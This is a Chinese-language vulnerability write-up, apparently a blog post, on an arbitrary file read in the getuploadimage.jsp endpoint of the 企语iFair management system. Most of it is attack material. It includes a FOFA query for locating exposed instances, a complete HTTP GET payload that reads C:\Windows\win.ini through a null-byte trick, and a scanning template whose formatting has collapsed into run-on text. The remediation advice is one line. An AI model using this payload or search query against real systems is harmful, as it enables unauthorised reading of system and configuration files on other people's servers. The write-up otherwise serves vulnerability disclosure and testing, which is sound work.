文章目录
- 免责申明
- 漏洞描述
- 搜索语法
- 漏洞复现
- yaml
- 修复建议
免责申明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
漏洞描述
企语iFair协同管理系统getuploadimage.jsp接口处存在任意文件读取漏洞,可以读取系统文件配置
搜索语法
fofa
app="服务社-企语iFair"
漏洞复现
payload
GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%001.png HTTP/1.1
Host:
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
yaml
id: template-idinfo:name: Template Nameauthor: 'xl'severity: infodescription: descriptionreference:- https://tags: tagshttp:- raw:- |+GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%001.png HTTP/1.1Host: {{Hostname}}Cache-Control: max-age=0Accept-Language: zh-CNUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brConnection: keep-alivematchers-condition: andmatchers:- type: wordpart: bodywords:- extensions- type: statusstatus:- 200修复建议
更新到最新版本
